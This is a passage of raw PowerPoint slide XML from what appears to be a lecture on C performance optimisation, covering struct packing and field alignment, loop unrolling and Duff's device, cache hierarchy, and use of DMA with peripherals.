            <a:off x="6781800" y="3886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3" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4038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4" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4191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5" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4343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6" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4495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7" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4648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8" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800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9" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="51054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0" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="44958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1" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="38862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2" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="32766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3" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="32766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 name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="38862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5" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="44958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6" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="49530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47" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="3138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i8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17448" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3987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i32_a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17449" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="4495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i16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17450" name="Text Box 43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="52832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i32_b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17451" name="AutoShape 44"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5308600" y="3251200"/>
            <a:ext cx="76200" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1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2" name="AutoShape 45"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="38862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3" name="AutoShape 46"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="4495800"/>
            <a:ext cx="76200" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3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4" name="AutoShape 47"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="51054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5" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7937500" y="30876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i8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17456" name="Text Box 49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7937500" y="35687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i32_a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17457" name="Text Box 50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7937500" y="40513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i16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17458" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7937500" y="45847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i32_b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17459" name="AutoShape 52"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7607300" y="3265488"/>
            <a:ext cx="76200" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1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0" name="AutoShape 53"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7632700" y="34671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1" name="AutoShape 54"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7632700" y="4051300"/>
            <a:ext cx="76200" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3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2" name="AutoShape 55"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7632700" y="44069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3" name="Rectangle 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="28194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800" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Unpacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17464" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="28194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800" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Packed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17465" name="Rectangle 59"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3352800"/>
            <a:ext cx="3657600" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>typedef</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struct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my_struct</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uint8 i8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	uint32 i32_a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	uint16 i16;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	uint32 i32_b;</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722538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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processor’s Register Width (III)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assuming a 4-byte width:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the packed structure, uin32_a and uint32_b span two memory addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implication: To change either of these fields, processor has to load two addresses and then store two addresses !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Conclusion: Either use unpacked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>structs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, or pack wisely (with consideration of field alignment).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even better: don’t pack, but order fields in decreasing size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418289210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Loop Unrolling</a:t>
            </a:r>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19460" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="7848600" cy="157003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copy(</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from,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to,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count)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=0;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&lt;count;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*to++ = *from++;</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3200400"/>
            <a:ext cx="7848600" cy="354012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copy(</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from,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to,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count)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 (count % 4) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	case 3:	 *to++ = *from++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	case 2:	 *to++ = *from++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	case 1:	 *to++ = *from++;</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (i=0; i&lt;count/4; ++i) {</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23533740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Loop Unrolling – Duff’s Device</a:t>
            </a:r>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4032250"/>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copy(</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from,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to,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count)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register</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> n = (count + 7) / 8;</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 (count % 8)</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0:	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {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7: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6: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5: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4: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3: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2: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1:		*to++ = *from++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		      } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (--n &gt; 0);</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43944303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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>External Memory Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3124200"/>
            <a:ext cx="8229600" cy="3581400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Cache smaller and faster than main memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>If multiple cache levels exist, each level smaller and faster than next level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>A miss in one cache level causes a miss penalty, and data from the next memory needs to be fetched.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>By designing the most frequently accessed data to continuously reside in cache, it’s possible to avoid very frequent penalties.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334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Processor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="33528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Cache(s)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21510" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="60960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Main Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21511" name="AutoShape 7"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="21508" idx="3"/>
            <a:endCxn id="21509" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2286000"/>
            <a:ext cx="838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2" name="AutoShape 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="21509" idx="3"/>
            <a:endCxn id="21510" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="2286000"/>
            <a:ext cx="76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13" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="37338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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="43434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1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="49530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736695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Know your peripherals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Learn the timing and performance requirements of the peripherals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See how they can be used optimally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use DMA engines to save processing time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2356376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457200" y="533400"/>
            <a:ext cx="4267200" cy="203200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copy16(</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p1,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p2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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*p1=*p2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	*(p1+1)=*(p2+1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	*(p1+2)=*(p2+2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	*(p1+3)=*(p2+3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
